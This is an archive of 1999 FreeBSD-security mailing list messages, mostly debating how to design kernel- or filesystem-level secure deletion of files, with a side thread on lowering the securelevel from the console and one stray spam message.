From: Javier Henderson MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14149.41345.818718.833426@bogon.kjsl.com> Date: Fri, 21 May 1999 11:10:09 -0700 (PDT) To: brooks@one-eyed-alien.net Cc: Dag-Erling Smorgrav , "Ilmar S. Habibulin" , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: References: X-Mailer: VM 6.63 under Emacs 19.34.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org brooks@one-eyed-alien.net writes: > On 21 May 1999, Dag-Erling Smorgrav wrote: > > > "Ilmar S. Habibulin" writes: > > > Why mount option? Secure deletion is a feature of fs and impacts files of > > > this on this fs. All of them. So why use mount option? > > > > Because a mount option can be changed at runtime, whereas a kernel > > option cannot. A mount option would allow you to enable the security > > feature on file systems which need it but not on file systems which do > > not need it, whereas a kernel option would enable it unconditionally > > on all file systems. > > I'd definaly agree that it should be done on an FS by FS bases, but it > seems that a tunefs flag like softupdates might be more appropriate. My > reason for this is simply that if you forget to enable the option once and > do any write operations to speak of, you will need to completly wipe the > entire FS to ensure you actually destroy the old data. Making it a tunefs > option would mean that you couldn't forget. Just in the interest of throwing ideas around, and not to start an OS war: With VMS, you can define at mount time, or at any time afterwards (ie, while the volume is already mounted) whether you want files erased-on-delete or not. If you change the behavior at some point after mounting the volume, the new behavior will affect deletions made after the change of behavior. 
There is also a CLI qualifier for the DELETE command, appropriately named /ERASE (e.g., DELETE/ERASE FOO.TXT) that you can use on demand. This kind of flexibility would be cool, I think. -jav To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 11:11: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id A6C13159DB for ; Fri, 21 May 1999 11:10:55 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id UAA29620; Fri, 21 May 1999 20:10:50 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id UAA89224; Fri, 21 May 1999 20:10:44 +0200 (MET DST) Date: Fri, 21 May 1999 20:10:43 +0200 
From: Eivind Eklund To: brooks@one-eyed-alien.net Cc: Dag-Erling Smorgrav , "Ilmar S. Habibulin" , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion Message-ID: <19990521201043.I85583@bitbox.follo.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: ; from brooks@one-eyed-alien.net on Fri, May 21, 1999 at 11:04:25AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 21, 1999 at 11:04:25AM -0700, brooks@one-eyed-alien.net wrote: > On 21 May 1999, Dag-Erling Smorgrav wrote: > > > "Ilmar S. Habibulin" writes: > > > Why mount option? Secure deletion is a feature of fs and impacts files of > > > this on this fs. All of them. So why use mount option? > > > > Because a mount option can be changed at runtime, whereas a kernel > > option cannot. A mount option would allow you to enable the security > > feature on file systems which need it but not on file systems which do > > not need it, whereas a kernel option would enable it unconditionally > > on all file systems. > > I'd definaly agree that it should be done on an FS by FS bases, but it > seems that a tunefs flag like softupdates might be more appropriate. My > reason for this is simply that if you forget to enable the option once and > do any write operations to speak of, you will need to completly wipe the > entire FS to ensure you actually destroy the old data. Making it a tunefs > option would mean that you couldn't forget. Either tunefs or chflags - it would be relatively expensive, so if you only need it for some data, it is probably better to have more fine-grained control than per-FS. Eivind. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 12:35:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from andrew.cmu.edu (ANDREW.CMU.EDU [128.2.10.101]) by hub.freebsd.org (Postfix) with ESMTP id 169311502C; Fri, 21 May 1999 12:35:09 -0700 (PDT) (envelope-from tcrimi+@andrew.cmu.edu) Received: (from postman@localhost) by andrew.cmu.edu (8.8.5/8.8.2) id PAA20959; Fri, 21 May 1999 15:35:06 -0400 (EDT) Received: via switchmail; Fri, 21 May 1999 15:35:05 -0400 (EDT) Received: from unix6.andrew.cmu.edu via qmail ID ; Fri, 21 May 1999 15:34:57 -0400 (EDT) Received: from unix6.andrew.cmu.edu via qmail ID ; Fri, 21 May 1999 15:34:57 -0400 (EDT) Received: from mms.4.60.Jun.27.1996.03.02.53.sun4.51.EzMail.2.0.CUILIB.3.45.SNAP.NOT.LINKED.unix6.andrew.cmu.edu.sun4m.54 via MS.5.6.unix6.andrew.cmu.edu.sun4_51; Fri, 21 May 1999 15:34:56 -0400 (EDT) Message-ID: Date: Fri, 21 May 1999 15:34:56 -0400 (EDT) 
From: Thomas Valentino Crimi
To: brooks@one-eyed-alien.net, Eivind Eklund
Subject: Re: secure deletion
Cc: Dag-Erling Smorgrav, "Ilmar S. Habibulin", posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
In-Reply-To: <19990521201043.I85583@bitbox.follo.net>
References: <19990521201043.I85583@bitbox.follo.net>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Excerpts from mail: 21-May-99 Re: secure deletion by Eivind Eklund@FreeBSD.OR
> Either tunefs or chflags - it would be relatively expensive, so if you
> only need it for some data, it is probably better to have more
> fine-grained control than per-FS.

Might I also suggest a 'normal' user option for one particular file to
be securely wiped? Myself I use a simple replacement for rm I call wipe.
It overwrites, fsyncs, overwrites again with the 10101, 01010 pattern,
zeros out the file, renames it to a random direntry and then unlinks
(whoa.. talk about what would happen to hardlinks :). As an extra option
to rm, for a user to be able to tell the kernel to securely delete a file
even though it isn't routinely flagged for it (having to chflags then rm
for each case is rather silly, although rm -w or something should do it
for you).

BTW, might I take it that with the kernel deletion method, a warning
should occur if you attempt to delete a secure file which still has a
hardlink to it.
From owner-freebsd-security Fri May 21 16:16:37 1999
Delivered-To: freebsd-security@freebsd.org
Received: from narcissus.net (narcissus.net [209.73.230.146]) by hub.freebsd.org (Postfix) with ESMTP id D8F2914DF2 for ; Fri, 21 May 1999 16:16:27 -0700 (PDT) (envelope-from ben@narcissus.net)
Received: by narcissus.net (Postfix, from userid 1000) id 2EE85184; Fri, 21 May 1999 19:08:00 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1]) by narcissus.net (Postfix) with SMTP id 1FC7D183; Fri, 21 May 1999 19:08:00 -0400 (EDT)
Date: Fri, 21 May 1999 19:08:00 -0400 (EDT)
From: Snob Art Genre
To: Patrick Bihan-Faou
Cc: Darren Reed, Gregory Sutter, wes@softweyr.com, imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
In-Reply-To: <19990520145800.B5E31150AF@hub.freebsd.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 20 May 1999, Patrick Bihan-Faou wrote:
> - basic: what the original poster was suggesting: writing garbage data (be
> it zero or some pattern) over the deleted chunks. The clear advantage of
> that is that if you try to recover the freed blocks on a system comparable
> to the original system, you will probably not get anything useful out of the
> disk.

If I understand correctly, it's conceivable that someone could break into my
system over the network and get access to the raw disk device, and thereby
read data that have been deleted but not overwritten. That's a good bit
easier than physically breaking in and taking the disk.

So I can see some use for functionality that overwrites files on unlink()
thoroughly enough to prevent further reading by the disk head, even if it
offers no protection against the kind of specialized reading devices that
can be used on a captured hard disk platter.

I'm not advocating this measure so much as pointing out that there is a
perceptible level of security between what we currently have and
military-grade.
Ben
@narcissus.net -- finally

From owner-freebsd-security Fri May 21 16:19:46 1999
Delivered-To: freebsd-security@freebsd.org
Received: from host07.rwsystems.net (kasie.rwsystems.net [209.197.192.103]) by hub.freebsd.org (Postfix) with ESMTP id ECF561564C for ; Fri, 21 May 1999 16:19:44 -0700 (PDT) (envelope-from jwyatt@RWSystems.net)
Received: from kasie.rwsystems.net([209.197.192.103]) (1172 bytes) by host07.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Fri, 21 May 1999 18:04:40 -0500 (CDT) (Smail-3.2.0.104 1998-Nov-20 #1 built 1998-Dec-24)
Date: Fri, 21 May 1999 18:04:40 -0500 (CDT)
From: James Wyatt
To: "Ilmar S. Habibulin"
Cc: Dag-Erling Smorgrav, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 21 May 1999, Ilmar S. Habibulin wrote:
> On 21 May 1999, Dag-Erling Smorgrav wrote:
> > > My thoughts are about an option in kernel config file (WIPEINFO?)
> > A mount option would be better.
> Why mount option? Secure deletion is a feature of fs and impacts files of
> this on this fs. All of them. So why use mount option?

I took him to mean that you could have a mount option to disallow it on a
particular filesystem. (like nosuid, etc..) - Jy@

From owner-freebsd-security Fri May 21 16:24:24 1999
Delivered-To: freebsd-security@freebsd.org
Received: from narcissus.net (narcissus.net [209.73.230.146]) by hub.freebsd.org (Postfix) with ESMTP id CBA3814DF2 for ; Fri, 21 May 1999 16:24:21 -0700 (PDT) (envelope-from ben@narcissus.net)
Received: by narcissus.net (Postfix, from userid 1000) id EE281184; Fri, 21 May 1999 19:15:45 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1]) by narcissus.net (Postfix) with SMTP id DFD56183; Fri, 21 May 1999 19:15:45 -0400 (EDT)
Date: Fri, 21 May 1999 19:15:45 -0400 (EDT)
From: Snob Art Genre
To: Avalon Books
Cc: Joel Maslak, security@FreeBSD.ORG
Subject: Re: Secure Deletion
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 20 May 1999, Avalon Books wrote:
> Actually, I've done this already. At the moment, it's a simple
> stand-alone program (I originally wrote during my DOS days, years ago),
> but I've been toying with the idea of adding the method in as an option
> for 'rm'. No need to tie up the kernel with this sort of thing.

Won't your program have to keep going into the kernel to fsync() anyway?

Ben
@narcissus.net -- finally

From owner-freebsd-security Fri May 21 16:34:50 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.eurochannel.de (unknown [195.88.158.130]) by hub.freebsd.org (Postfix) with ESMTP id C870B15024 for ; Fri, 21 May 1999 16:34:44 -0700 (PDT) (envelope-from art@eurochannel.de)
Received: by mail.eurochannel.de with MERCUR-SMTP/POP3-Server (v2.10) for at Thu, 20 May 99 17:21:02 +0200
From: art@eurochannel.de
To: art@eurochannel.de
Subject: Data Updating Request
Date: Thu, 20 May 99 17:21:02 +0200
Message-Id: <990520172102728300@mail.eurochannel.de>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Dear Sir or Madam,

The wwwARTchannel is a system dedicated to cover the Antiques, Architecture, Crafts, Dance, Design, Fashion, Film & Video, Fine Art, Literature, Multimedia, Music, Photography, Show Biz, Television and Theatre communities. Besides its own database it offers a unified access to over 500 different international and national search engines and more than 1.200 directories and resource pages.

In order to be able to offer accurate information about you and your Site for your own benefit we suggest you to re-check and to update your URL at http://www.logisearch.net/art

Regards,
wwwARTchannel Information desk

From owner-freebsd-security Fri May 21 18:07:06 1999
Delivered-To: freebsd-security@freebsd.org
Received: from theverge.com (CDR16-24.accesscable.net [24.138.16.24]) by hub.freebsd.org (Postfix) with SMTP id ACC2014CA6 for ; Fri, 21 May 1999 18:06:57 -0700 (PDT) (envelope-from charlesiii@theverge.com)
Received: (qmail 31994 invoked from network); 22 May 1999 01:03:27 -0000
Received: from unknown (HELO theverge.com) (24.138.16.23) by 24.138.16.23 with SMTP; 22 May 1999 01:03:27 -0000
Date: Fri, 21 May 1999 22:03:27 -0300 (ADT)
From: Charles
To: Snob Art Genre
Cc: Patrick Bihan-Faou, Darren Reed, Gregory Sutter, wes@softweyr.com, imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> If I understand correctly, it's conceivable that someone could break into my
> system over the network and get access to the raw disk device, and thereby
> read data that have been deleted but not overwritten. That's a good bit
> easier than physically breaking in and taking the disk.

If your data is that important, what are you doing on a network in the
first place, eh?

From owner-freebsd-security Fri May 21 18:19:30 1999
Delivered-To: freebsd-security@freebsd.org
Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id C268515000 for ; Fri, 21 May 1999 18:19:26 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au)
Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id LAA15588 for security@FreeBSD.ORG; Sat, 22 May 1999 11:19:25 +1000 (EST) (envelope-from wkt)
From: Warren Toomey
Message-Id: <199905220119.LAA15588@henry.cs.adfa.edu.au>
Subject: Re: Lowering securelevel from console?
In-Reply-To: <199905211555.LAA23107@khavrinen.lcs.mit.edu> from Garrett Wollman at "May 21, 1999 11:55:10 am"
To: security@FreeBSD.ORG
Date: Sat, 22 May 1999 11:19:25 +1000 (EST)
Reply-To: wkt@cs.adfa.edu.au
X-Mailer: ELM [version 2.4ME+ PL43 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In a previous article, I asked about the pros/cons of allowing a root
process which had the console as its controlling terminal to be able to
lower the kernel's securelevel. What I'm suggesting (in pseudo-code) is:

    static int
    sysctl_kern_securelvl SYSCTL_HANDLER_ARGS
    {
        . . .
        if (level < securelevel) {
            if (not superuser or controlling terminal is not console)
                return (EPERM);
        }
        securelevel = level;
    }

Dima Rubin replied:

    Enabling securelevel changes from the console w/o breaking into the
    debugger is potentially dangerous.

Garrett Wollman replied:

    A rogue root process could use the debugger to take control of another
    process (e.g., getty) and force it to disengage security.

I think I understand the issue: if someone can break in as root, at the
present they cannot lower the securelevel without rebooting the system.
With the changes above, they could hijack getty (which runs as root and
has the console open) and use it to lower the securelevel.

I'd still like to have the ability to temporarily lower the securelevel
without having to suffer the delay of a reboot. Is this essentially
infeasible, or are there any ways of authenticating the `real' super-user?
Ideas of building a one-way hash function and a hashed password into the
kernel have just floated into my head, but that seems like overkill :-)

Thanks for the feedback!
Warren

From owner-freebsd-security Fri May 21 19:15:25 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A2AE814C3C for ; Fri, 21 May 1999 19:15:22 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA70739; Fri, 21 May 1999 20:14:09 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA00358; Fri, 21 May 1999 20:14:00 -0600 (MDT)
Message-Id: <199905220214.UAA00358@harmony.village.org>
To: Charles
Subject: Re: secure deletion
Cc: freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Fri, 21 May 1999 22:03:27 -0300."
Date: Fri, 21 May 1999 20:14:00 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message Charles writes:
: If your data is that important what are you doing on a network
: in the first place eh?

I can see an excellent use for this technology.

First, I'd like to see an option that will turn this on for all files in a
file system. The reason for doing that is because I'd like to turn it on my
/tmp partition so that any temp files are killed dead. Many mail
programs/readers/etc will write to /tmp. Most are good enough to open the
file and immediately unlink it (however, since it is still open, the data
still may wind up on disk). This, btw, is one reason why modifying unlink
in libc is insufficient. I know this would be a performance hit, but I do
not care.

I can also see setting this bit for a directory as well. Since I use mh for
my email, when I do an inc, I get lots of files in one directory. When this
bit is set in the directory, then when a file is deleted, it is shredded
completely. I do not want to have to set bits on all my mail. The mail that
I get might contain sensitive information that I do not wish to have
disclosed to anybody should my machine be seized before those disk blocks
can be reused.

Another reason for placing it into the kernel has been stated before.
Namely that if a file grows, then the fragment that was previously in use
at the end of the file needs to be shredded.

It all depends on what level you want to be paranoid. I can certainly
understand the desire for people to run with this feature for a normal,
production system. A mail relay system, for example, would be an excellent
candidate. That system is potentially exposed to the outside world. With a
shredding option in place, it becomes impossible for an intruder to gain
access to snippets of email from prior days that were spinning on the disk
unallocated.

While there is still a lot that an intruder can do on that system, you have
a very very very high level of assurance that he/she/it didn't get
information that predates the penetration, save what was in the mail
queues. Without this, you have no such assurances. While it is true that
the intruder can do damage after the penetration, or steal data that flows
through the machine after such a penetration, most detection procedures
will detect this intrusion.

Finally, networks are a way of life for many people. I cannot control what
people send me over the network. Most of the sensitive information does
come to me encrypted, but I want protection for the stuff that isn't. To
assume that just because a machine is on the network it contains no
interesting data (or that it can contain no interesting data) is not a
valid assumption. The suggestion of removing the machine from the network
is unhelpful.

Just trying to present a reasonable view about why someone would want to
use this feature, and some design parameters that would maximize its
usefulness.

Warner

From owner-freebsd-security Fri May 21 19:18:01 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 71E4314E64 for ; Fri, 21 May 1999 19:17:57 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA70749; Fri, 21 May 1999 20:16:45 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA00385; Fri, 21 May 1999 20:16:37 -0600 (MDT)
Message-Id: <199905220216.UAA00385@harmony.village.org>
To: wkt@cs.adfa.edu.au
Subject: Re: Lowering securelevel from console?
Cc: security@FreeBSD.ORG
In-reply-to: Your message of "Sat, 22 May 1999 11:19:25 +1000." <199905220119.LAA15588@henry.cs.adfa.edu.au>
References: <199905220119.LAA15588@henry.cs.adfa.edu.au>
Date: Fri, 21 May 1999 20:16:37 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <199905220119.LAA15588@henry.cs.adfa.edu.au> Warren Toomey writes:
: I think I understand the issue: if someone can break in as root, at the
: present they cannot lower the securelevel without rebooting the system.

That is the design goal. Modulo bugs in device drivers, that is the case.

: I'd still like to have the ability to temporarily lower the securelevel
: without having to suffer the delay of a reboot. Is this essentially
: infeasible, or are there any ways of authenticating the `real' super-user?

options DDB in your kernel. However, that assumes that physical possession
of the console (or the ability to get to it if it is a serial console) is
secure enough.

Warner

From owner-freebsd-security Fri May 21 20:37:28 1999
Delivered-To: freebsd-security@freebsd.org
Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 8E52F14F44 for ; Fri, 21 May 1999 20:37:26 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id UAA29116; Fri, 21 May 1999 20:37:23 -0700 (PDT)
Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id UAA13713; Fri, 21 May 1999 20:37:23 -0700
Received: from softweyr.com ([204.68.178.39]) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA04565; Fri, 21 May 99 20:37:16 PDT
Message-Id: <3746266A.73D34043@softweyr.com>
Date: Fri, 21 May 1999 21:37:14 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
Mime-Version: 1.0
To: Snob Art Genre
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Snob Art Genre wrote:
>
> So I can see some use for functionality that overwrites files on unlink()
> thoroughly enough to prevent further reading by the disk head, even if it
> offers no protection against the kind of specialized reading devices that
> can be used on a captured hard disk platter.
>
> I'm not advocating this measure so much as pointing out that there is a
> perceptible level of security between what we currently have and
> military-grade.

I agree, if your security measures cost more than the worth of your data,
you're shooting yourself in the foot. But, on the other hand, if you're
going to implement a page- or file-overwriting algorithm, you might as well
use one that has some chance of success, as opposed to the "pissing in the
wind" effort of overwriting them with zeroes. The pattern used in rm -P is
a step in the right direction, but alternating bits works better than
successive generations of all ones then all zeroes.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters
Softweyr LLC
http://www.softweyr.com/~softweyr
wes@softweyr.com

From owner-freebsd-security Fri May 21 23:44:51 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id A38E6151CB for ; Fri, 21 May 1999 23:44:46 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru)
Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id KAA16548; Sat, 22 May 1999 10:44:45 +0400 (MSD)
Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id KAA25114; Sat, 22 May 1999 10:44:44 +0400 (MSD)
Date: Sat, 22 May 1999 10:44:44 +0400 (MSD)
From: "Ilmar S. Habibulin"
To: Dag-Erling Smorgrav
Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 21 May 1999, Dag-Erling Smorgrav wrote:
> Because a mount option can be changed at runtime, whereas a kernel
> option cannot. A mount option would allow you to enable the security
> feature on file systems which need it but not on file systems which do
> not need it, whereas a kernel option would enable it unconditionally
> on all file systems.

And what about it? I just don't understand why this option must be
fs-specific. If a file has no flag, it would be deleted in the ordinary way.

From owner-freebsd-security Fri May 21 23:54:15 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id 6F71D15387 for ; Fri, 21 May 1999 23:54:09 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru)
Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id KAA16847; Sat, 22 May 1999 10:54:08 +0400 (MSD)
Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id KAA25382; Sat, 22 May 1999 10:54:08 +0400 (MSD)
Date: Sat, 22 May 1999 10:54:08 +0400 (MSD)
From: "Ilmar S. Habibulin"
To: James Wyatt
Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 21 May 1999, James Wyatt wrote:
> > > > My thoughts are about an option in kernel config file (WIPEINFO?)
> > > A mount option would be better.
> > Why mount option? Secure deletion is a feature of fs and impacts files of
> > this on this fs. All of them. So why use mount option?
>
> I took him to mean that you could have a mount option to disallow it on a
> particular filesystem. (like nosuid, etc..) - Jy@

Ok, I understand. And about a kernel config option to enable the wipe
feature - we can make this feature controllable through the sysctl
interface. Disadvantage - some permanent code (maybe unused at all).

From owner-freebsd-security Sat May 22 00:02:36 1999
Delivered-To: freebsd-security@freebsd.org
Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id C39DC15214 for ; Sat, 22 May 1999 00:02:31 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au)
Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id RAA05553; Sat, 22 May 1999 17:02:17 +1000
Date: Sat, 22 May 1999 17:02:17 +1000
From: Bruce Evans
Message-Id: <199905220702.RAA05553@godzilla.zeta.org.au>
To: des@flood.ping.uio.no, patrick@mindstep.com
Subject: Re: secure deletion
Cc: darrenr@reed.wattle.id.au, freebsd-security@FreeBSD.ORG, gsutter@pobox.com, ilmar@ints.ru, imp@harmony.village.org, posix1e@cyrus.watson.org, wes@softweyr.com
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>> I agree with that last statement. An implementation on FreeBSD probably does
>> not need to write multiple times to the disk.
>
>Wouldn't work, anyway, unless you disable write caching (not just on
>the disk, but in the disk driver as well - no soft updates!).
>Otherwise, all passes but the last will be ignored, unless you wipe a
>really big file (too big to fit in cache).

man fsync

Bruce

From owner-freebsd-security Sat May 22 01:38:31 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 40E4D14BF1 for ; Sat, 22 May 1999 01:38:19 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id CAA71699; Sat, 22 May 1999 02:37:04 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id CAA02030; Sat, 22 May 1999 02:36:59 -0600 (MDT)
Message-Id: <199905220836.CAA02030@harmony.village.org>
To: "Ilmar S. Habibulin"
Subject: Re: secure deletion
Cc: Dag-Erling Smorgrav, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Sat, 22 May 1999 10:44:44 +0400."
Date: Sat, 22 May 1999 02:36:59 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message "Ilmar S. Habibulin" writes:
: On 21 May 1999, Dag-Erling Smorgrav wrote:
:
: > Because a mount option can be changed at runtime, whereas a kernel
: > option cannot. A mount option would allow you to enable the security
: > feature on file systems which need it but not on file systems which do
: > not need it, whereas a kernel option would enable it unconditionally
: > on all file systems.
: And what about it? I just don't understand why this option must be
: fs-specific. If a file has no flag, it would be deleted in the ordinary way.

I think that what people are saying, if I understand them correctly, is
that it would be desirable if an entire file system could be told to do
the shredding delete. This would make it useful for a filesystem mounted
on /tmp, for example.

Warner

From owner-freebsd-security Sat May 22 02:51:25 1999
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id ACA1114C1E for ; Sat, 22 May 1999 02:51:15 -0700 (PDT) (envelope-from des@flood.ping.uio.no)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id LAA84596; Sat, 22 May 1999 11:50:01 +0200 (CEST) (envelope-from des)
To: Bruce Evans
Cc: patrick@mindstep.com, darrenr@reed.wattle.id.au, freebsd-security@FreeBSD.ORG, gsutter@pobox.com, ilmar@ints.ru, imp@harmony.village.org, posix1e@cyrus.watson.org, wes@softweyr.com
Subject: Re: secure deletion
References: <199905220702.RAA05553@godzilla.zeta.org.au>
From: Dag-Erling Smorgrav
Date: 22 May 1999 11:50:00 +0200
In-Reply-To: Bruce Evans's message of "Sat, 22 May 1999 17:02:17 +1000"
Lines: 12
X-Mailer: Gnus v5.5/Emacs 19.34
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Bruce Evans writes:
> > Wouldn't work, anyway, unless you disable write caching (not just on
> > the disk, but in the disk driver as well - no soft updates!).
> > Otherwise, all passes but the last will be ignored, unless you wipe a
> > really big file (too big to fit in cache).
> man fsync

Doh. Where is my head? Oh, I left it at the bar last night...

DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Sat May 22 04:23:13 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id 601ED14C96 for ; Sat, 22 May 1999 04:23:10 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru)
Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id PAA25616; Sat, 22 May 1999 15:23:09 +0400 (MSD)
Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id PAA32769; Sat, 22 May 1999 15:23:08 +0400 (MSD)
